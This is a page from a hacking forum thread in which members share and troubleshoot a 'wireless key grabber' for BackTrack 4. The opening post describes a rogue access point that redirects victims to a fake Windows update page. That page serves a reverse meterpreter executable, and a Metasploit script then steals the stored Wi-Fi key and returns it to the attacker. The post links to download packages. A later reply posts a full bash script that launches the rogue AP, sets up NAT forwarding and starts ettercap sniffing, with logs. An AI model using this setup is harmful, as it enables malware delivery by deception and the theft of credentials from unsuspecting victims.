Page 1 of 2 12 LastLast
Results 1 to 10 of 44

Thread: Wireless key grabber - Backtrack 4

Hybrid View

  1. #1
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    I have simplified my previous tutorial on grabbing wireless keys

    specially setup for backtrack 4,





    here is the intro

    This is a simplified tutorial for grabbing wireless keys from our victim, regardless of their wireless security. The theory is we create a fake access point, our victim connects, tries to surf the internet but gets redirected to our fake update page. Victim then downloads our “windows update” which is a reverse meterpreter exe. Metasploit then runs it script, uploads wireless key viewer, executes on victims computer, creates a random titled text file containing the pc’s wireless key, and uploads back to backtrack.


    Crippled features :
    Reverse meterpreter port set to 5555, to be stealthy we should choose another port
    Windows update html (index.html), a very simplified page, to be stealthy you need to redesign
    rar file here
    http://www.megaupload.com/?d=C5LDSQEE

    readme at http://www.megaupload.com/?d=MM98S29W

    cr1spyj0nes --- is this what you needed?

    I'm sure we can automate the remainder,


    edit , lots of views but no comments? does it work?

  2. #2
    Junior Member
    Join Date
    Oct 2008
    Posts
    82

    Default

    I will try it out but before that I need also to get your Fake AP project running.

    Then I will understand this much more easier!

    By the way have a look in my thread http://forums.remote-exploit.org/showthread.php?t=21134 I need some help over getting it to work.

    Do I have to disable the DHCP service on my router ? This might be one of the reasons why It didn't work.

    Check it and let me know beside !

    Thank you!

  3. #3
    Just burned his ISO
    Join Date
    Mar 2009
    Posts
    12

    Default Wireless key grabber - Backtrack 4

    @hm2075
    Thanks a lot for all ur tutorials so far.

    I tried ur method in BT4 with partially success. The first issue i had was with the dhcp server. The client was connected but unable to obtain a valid IP. After some investigation it appeared to be an issue with the user groups of the dhcpd.

    When i issued this command: # dhcpd3 -cf /etc/dhcpd3/dhcpd.conf at0
    It returned an error: Cannot create an entry /var/run/dhcpd.pid -- Permission denied.

    To mitigate this I followed:
    #vim /var/run/dhcpd.pid
    #chgrp dhcpd /var/run/dhcpd.pid
    #chown dhcpd /var/run/dhcpd.pid
    Then i restarted the dhcp server and connected clients were able to get valid IPs.

    The next issue I had was obtaining the key.
    Once i was connected to the fake IP, downloaded and installed the file, however i was not able to receive the txt file with the wpa key. On the metasploit terminal it stuck for ages on: Uploading key....(Or something like that)

    Any suggestions?

    Regards

    ZŁY$

  4. #4
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    are you sure you are using my wireless key grabber for backtrack 4 and not backtrack 3?


    i see u have issued

    dhcpd3 -cf /etc/dhcpd3/dhcpd.conf at0

    whereas u should have issued

    /etc/init.d/dhcp3-server restart



    if you are following the old tutorial then it may not work, follow this one and it should be fine
    http://forums.remote-exploit.org/showthread.php?t=21144


    can a mod merge with this thread please

    http://forums.remote-exploit.org/showthread.php?t=21144

  5. #5
    Just burned his ISO
    Join Date
    Mar 2009
    Posts
    12

    Default

    I definately used the correct grabber.

    As I explained i had an issue with the dhcp, not issuing IPs once connected. By trying to restart the dhcp server with this command "/etc/init.d/dhcp3-server restart" it was displaying a "fail" error message. Hence my workaround to bypass this issue, which worked a treat.

    However my issue was with the keygrabber not uploading back the key.
    From the connected client i telnet back to my BT4 on port 5555 to see if a connection is established. As soon as i connected to the port i could see all that the registry values been transfered, and on the metasploit terminal a message appeared as "upload success", however no txt file was present on the BT4.

    hmmm i m a bit puzzled....I ll give it another go with a different laptop.
    (Pls note that the laptop i tried it on was of limited priviledges so i dont know if this pose any limitations.....)

    I cannot post yet on the wireless section, thus my new thread in this section...

  6. #6
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    ah i see, didn't realise that you couldn't post in the wireless section,


    looks like you almost got it to work, wkv uploaded and executed and victim's computer, just the key text file not downloaded,

    open up the harvester.rb file and look at the coding in there, maybe you just need to amend the destination of the text file,


    i can explain each line to you if you get stuck

  7. #7
    Junior Member
    Join Date
    Apr 2008
    Posts
    36

    Default

    hm2075 please can you upload rar file and readme file on somewhere else rather than megaupload

  8. #8
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    any suggestions?

  9. #9
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Threads merged
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  10. #10
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    I'm trying to work through your tutorial. I'm running Backtrack 3, so I know some of the pre-requisites will install and behave differently. With that said, can you perhaps help me troubleshoot my configuration?
    Attack PC:
    RTL8187L USB adapter

    Victim:
    MS Vista
    Intel 4965AGN

    Things work up to the victim receiving an IP. What I can't seem to figure out is why traffic is not forwarding through the attacker eth0. Once that is addressed, I can move on to getting lighttpd working on BT3.

    Code:
    #!/bin/bash
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    kill `cat /var/run/dhcpd.pid`
    killall -9 dhcpd airbase-ng ettercap
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    modprobe tun
    konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
    sleep 10
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j MASQUERADE
    iptables -P FORWARD ACCEPT
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j MASQUERADE
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    echo > '/var/state/dhcp/dhcpd.leases'
    konsole -e dhcpd -d -f -cf /etc/dhcpd.conf at0 &
    konsole -e ettercap -T -q -p -i at0 // // &
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward
    airebase
    Code:
    3:41:24  Got broadcast probe request from 00:18:DE:3C:FB:BF
    13:41:24  Got broadcast probe request from 00:1D:E0:4F:B0:07
    13:41:25  Got directed probe request from 00:1F:3B:00:F2:51 - "test1234"
    13:41:25  Got an auth request from 00:1F:3B:00:F2:51 (open system)
    13:41:25  Client 00:1F:3B:00:F2:51 associated (unencrypted) to ESSID: "test1234"
    13:41:25  Got broadcast probe request from 00:18:DE:69:47:CD
    Ettercap
    Code:
    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
    
    Listening on at0... (Ethernet)
    
       at0 ->       00:C0:CA:19:A0:8C          10.0.0.1     255.255.255.0
    
    SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
    Privileges dropped to UID 65534 GID 65534...
    
    <truncated>
    
    DHCP: [00:1F:3B:00:F2:51] DISCOVER
    DHCP: [10.0.0.1] OFFER : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:1F:3B:00:F2:51] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222

    DHCPD
    Code:
    Listening on LPF/at0/00:c0:ca:19:a0:8c/10.0.0/24
    Sending on   LPF/at0/00:c0:ca:19:a0:8c/10.0.0/24
    Sending on   Socket/fallback/fallback-net
    DHCPDISCOVER from 00:1f:3b:00:f2:51 via at0
    DHCPOFFER on 10.0.0.254 to 00:1f:3b:00:f2:51 (victim) via at0
    DHCPREQUEST for 10.0.0.254 (10.0.0.1) from 00:1f:3b:00:f2:51 (victim) via at0
    DHCPACK on 10.0.0.254 to 00:1f:3b:00:f2:51 (victim) via at0
    DHCPINFORM from 10.0.0.254 via at0

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •